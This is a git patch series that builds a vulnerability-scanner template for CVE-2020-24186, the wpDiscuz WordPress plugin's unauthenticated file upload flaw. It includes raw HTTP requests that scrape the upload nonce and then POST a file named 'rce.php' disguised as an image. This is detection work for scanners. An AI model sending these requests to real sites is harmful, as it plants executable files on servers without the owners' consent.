From 5d61184601a388060e93fbf93c8fb3aa1ae78544 Mon Sep 17 00:00:00 2001 From: Ganesh Bagaria <11516116+Ganofins@users.noreply.github.com> Date: Sun, 28 Feb 2021 12:53:43 +0530 Subject: [PATCH 1/7] Create CVE-2020-24186.yaml --- cves/2020/CVE-2020-24186.yaml | 54 +++++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cves/2020/CVE-2020-24186.yaml diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml new file mode 100644 index 0000000000..5b9394c61e --- /dev/null +++ b/cves/2020/CVE-2020-24186.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-24186 + +info: + name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin + author: Ganofins + severity: high + description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. + reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md + tags: cve,cve2020,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 774 + Accept: */* + X-Requested-With: XMLHttpRequest + User-Agent: + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Cookie: + Connection: close + + ------WebKitFormBoundaryUGWBOKSwsalnzhha + Content-Disposition: form-data; name="action" + + wmuUploadFiles + ------WebKitFormBoundaryUGWBOKSwsalnzhha + Content-Disposition: form-data; name="wmu_nonce" + + aede3ab0b2 + ------WebKitFormBoundaryUGWBOKSwsalnzhha + Content-Disposition: form-data; name="wmuAttachmentsData" + + undefined + ------WebKitFormBoundaryUGWBOKSwsalnzhha + Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php" + Content-Type: image/jpeg + + ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC��� + �� + + ------WebKitFormBoundaryUGWBOKSwsalnzhha + Content-Disposition: form-data; name="postId" + + 393 + ------WebKitFormBoundaryUGWBOKSwsalnzhha-- + + matchers: + - type: status + status: + - 200 From 470ce5500364d75db9fea9906ecc04b9835cf71e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sun, 28 Feb 2021 13:36:59 +0530 Subject: [PATCH 2/7] Update CVE-2020-24186.yaml --- cves/2020/CVE-2020-24186.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 5b9394c61e..bf916c400a 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -16,11 +16,11 @@ requests: Content-Length: 774 Accept: */* X-Requested-With: XMLHttpRequest - User-Agent: + User-Agent: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - Cookie: + Cookie: Connection: close ------WebKitFormBoundaryUGWBOKSwsalnzhha From 83fd749b4eeacab5523f3d1e42706ea5c853694e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:47:36 +0530 Subject: [PATCH 3/7] template update --- cves/2020/CVE-2020-24186.yaml | 87 ++++++++++++++++++++++++----------- 1 file changed, 61 insertions(+), 26 deletions(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index bf916c400a..1da1e88e32 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -1,54 +1,89 @@ id: CVE-2020-24186 info: - name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE author: Ganofins severity: high description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - tags: cve,cve2020,wordpress,wp-plugin + tags: cve,cve2020,wordpress,wp-plugin,rce requests: - raw: - | - POST /wp-admin/admin-ajax.php HTTP/1.1 + GET /?p=1 HTTP/1.1 Host: {{Hostname}} - Content-Length: 774 Accept: */* - X-Requested-With: XMLHttpRequest - User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Cookie: Connection: close - ------WebKitFormBoundaryUGWBOKSwsalnzhha + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 745 + Accept: */* + X-Requested-With: XMLHttpRequest + sec-ch-ua-mobile: ?0 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: cors + Sec-Fetch-Dest: empty + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" - + wmuUploadFiles - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_nonce" - - aede3ab0b2 - ------WebKitFormBoundaryUGWBOKSwsalnzhha + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmuAttachmentsData" - + undefined - ------WebKitFormBoundaryUGWBOKSwsalnzhha - Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php" - Content-Type: image/jpeg - - ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC��� - �� + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - 393 - ------WebKitFormBoundaryUGWBOKSwsalnzhha-- + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and matchers: - type: status status: - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body From 6a976742d8345b1650f41828ed649c65d230e874 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:48:25 +0530 Subject: [PATCH 4/7] Update CVE-2020-24186.yaml --- cves/2020/CVE-2020-24186.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 1da1e88e32..c0face66e9 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -3,7 +3,7 @@ id: CVE-2020-24186 info: name: Unauthenticated File upload wpDiscuz WordPress plugin RCE author: Ganofins - severity: high + severity: critical description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce From 53359a730883fa6cfdc989aef468a5db0fc12640 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:50:00 +0530 Subject: [PATCH 5/7] Update CVE-2020-24186.yaml --- cves/2020/CVE-2020-24186.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index c0face66e9..41aba98766 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -36,15 +36,15 @@ requests: ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" - + wmuUploadFiles ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_nonce" - + {{wmuSecurity}} ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmuAttachmentsData" - + undefined ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" @@ -54,7 +54,7 @@ requests: ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="postId" - + 1 ------WebKitFormBoundary88AhjLimsDMHU1Ak-- From 10b262f8cf532d048720e73eea2d46e19b854c6b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:51:15 +0530 Subject: [PATCH 6/7] Adding to workflow --- workflows/wordpress-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 36be8a7c7b..1e53dfd7d1 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -22,6 +22,7 @@ workflows: - template: cves/2019/CVE-2019-19985.yaml - template: cves/2019/CVE-2019-20141.yaml - template: cves/2020/CVE-2020-11738.yaml + - template: cves/2020/CVE-2020-24186.yaml - template: cves/2020/CVE-2020-24312.yaml - template: cves/2020/CVE-2020-25213.yaml - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml @@ -45,4 +46,4 @@ workflows: - template: vulnerabilities/wordpress/wp-enabled-registration.yaml - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml - template: vulnerabilities/wordpress/wp-uploads-listing.yaml - - template: vulnerabilities/wordpress/wp-license-file.yaml + - template: vulnerabilities/wordpress/wp-license-file.yaml \ No newline at end of file From 9848b3b6719a3407e2a60648861e58aa059d37ea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:53:07 +0530 Subject: [PATCH 7/7] Update CVE-2020-24186.yaml --- cves/2020/CVE-2020-24186.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 41aba98766..db823bc245 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -49,7 +49,7 @@ requests: ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" Content-Type: image/png - + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} ------WebKitFormBoundary88AhjLimsDMHU1Ak